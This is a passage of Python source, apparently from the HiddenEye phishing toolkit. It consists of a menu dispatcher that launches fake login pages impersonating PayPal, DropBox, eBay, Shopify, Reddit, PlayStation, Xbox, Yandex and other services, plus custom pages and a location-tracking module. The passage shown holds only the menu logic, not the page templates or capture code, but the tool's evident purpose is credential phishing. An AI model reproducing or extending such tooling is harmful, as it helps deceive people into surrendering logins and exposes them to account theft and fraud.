        start_phishing_page('CryptoCurrency', customOption)
    elif option == '27':
        module_loading_message('DevianArt')
        customOption = ''
        start_phishing_page('DevianArt', customOption)
    elif option == '28':
        module_loading_message('DropBox')
        customOption = ''
        start_phishing_page('DropBox', customOption)
    elif option == '29':
        module_loading_message('eBay')
        customOption = ''
        start_phishing_page('eBay', customOption)
    elif option == '30':
        module_loading_message('MySpace')
        customOption = ''
        start_phishing_page('Myspace', customOption)
    elif option == '31':
        module_loading_message('PayPal')
        customOption = ''
        start_phishing_page('PayPal', customOption)
    elif option == '32':
        module_loading_message('Shopify')
        customOption = ''
        start_phishing_page('Shopify', customOption)
    elif option == '33':
        module_loading_message('Verizon')
        customOption = ''
        start_phishing_page('Verizon', customOption)
    elif option == '34':
        module_loading_message('Yandex')
        customOption = ''
        start_phishing_page('Yandex', customOption)
    elif option == '35':
        module_loading_message('Reddit')
        #customOption = input(
        #    "\nOperation mode:\nHiddenEye >>> {1}".format(default_palette[0], default_palette[2]))
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.lang_start_main_menu["reddit_operation_modes"])
        customOption = input(global_localization.input_line)
        start_phishing_page('Reddit', customOption)
    elif option == '36':
        module_loading_message('Subitoit')
        customOption = ''
        start_phishing_page('Subitoit', customOption)
    elif option == '37':
        module_loading_message('PlayStation')
        customOption = ''
        start_phishing_page('PlayStation', customOption)
    elif option == '38':
        module_loading_message('Xbox')
        customOption = ''
        start_phishing_page('Xbox', customOption)
    elif option == '39':
        module_loading_message('CUSTOM(1)')
        customOption = ''
        start_phishing_page('CUSTOM(1)', customOption)
    elif option == '40':
        module_loading_message('CUSTOM(2)')
        customOption = ''
        start_phishing_page('CUSTOM(2)', customOption)

    #Below Are Tools And Above Are Phishing Modules..

    elif option == '0A':
        module_loading_message('LOCATION')
        #customOption = input(
        #    "\nOperation mode:\n \n\n{0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2]))
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.
            lang_start_main_menu["additional_module_location_operation_modes"])
        customOption = input(global_localization.input_line)
        start_phishing_page('LOCATION', customOption)

    else:
        start_main_menu()